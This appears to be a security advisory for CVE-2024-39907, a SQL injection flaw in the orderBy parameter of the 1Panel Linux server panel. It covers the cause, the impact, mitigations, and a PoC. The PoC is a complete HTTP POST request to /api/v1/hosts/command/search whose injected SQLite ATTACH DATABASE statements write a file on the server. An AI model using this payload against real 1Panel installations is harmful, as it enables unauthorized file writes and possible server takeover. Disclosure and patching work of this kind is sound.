Vulnerable Version
version 1.10.12-tls
Fixed Version
update latest version
Base Score
9.8 critical
Vendor Discription:-
1Panel is a modern, open-source Linux server management panel that makes it easier to deploy and administer applications, websites, and databases. It offers a simple web-based interface for controlling Docker containers, system resources, and security settings without requiring much command-line experience. 1Panel’s capabilities include one-click application installation, monitoring, and automated maintenance, with the goal of making server administration more efficient and user friendly.
CVE-2024-39907 Description:-
CVE-2024-39907 is caused by unvalidated orderBy parameters in multiple DTOs being passed directly to GORM’s Order() method. Handlers and service functions received orderBy values from request DTOs and utilized them in fmt.Sprintf/GORM Order() calls without restricting permissible values; the upstream patch included one check on OrderBy fields, indicating that those inputs had not previously been filtered. Because user-controlled orderBy values can be interpreted as column references, an attacker can manipulate the ORDER BY clause (for example, orderBy=3 in the provided PoC maps to an unvalidated column reference), exposing the underlying SQL injection vector and enabling column-count / column-reference enumeration in vulnerable versions.
Impact:-
- Execute arbitrary SQL queries.
- Extract sensitive information from the database.
- Write arbitrary files to the server via SQL features.
- Ultimately achieve Remote Code Execution (RCE) under certain conditions.
Mitigation:-
- Apply Updates Promptly – Regularly update 1Panel to the latest version to ensure security patches and bug fixes are applied.
- Restrict Access – Limit panel access to trusted IP addresses or use a VPN to prevent exposure to the public internet.
- Strong Authentication – Enforce strong, unique passwords and enable two-factor authentication (2FA) for all administrator accounts.
- Least Privilege Principle – Assign minimal permissions to users and services, avoiding unnecessary root or admin-level access.
POC
After logging into the 1Panel control panel with the default credentials, the vulnerability resides in the /api/v1/hosts/command/search endpoint, where the orderBy parameter does not have adequate input validation, allowing SQL injection attacks.
To exploit the vulnerability, send the fraudulent POST request shown below:
POST /api/v1/hosts/command/search HTTP/1.1
Host: your-ip:10086
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Cookie: psession=your-session-cookie
Connection: close
Content-Type: application/json
Content-Length: 83
{
"page":1,
"pageSize":10,
"groupID":0,
"orderBy":"3;ATTACH DATABASE '/tmp/randstr.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;",
"order":"ascending",
"name":"a"
}The malicious payload in the orderBy argument uses SQLite’s ATTACH DATABASE feature to generate arbitrary files on the server’s disk, exhibiting successful SQL injection. When processed, the 1Panel backend executes the injected SQL statements without validation, demonstrating that the vulnerability exists and can be exploited.
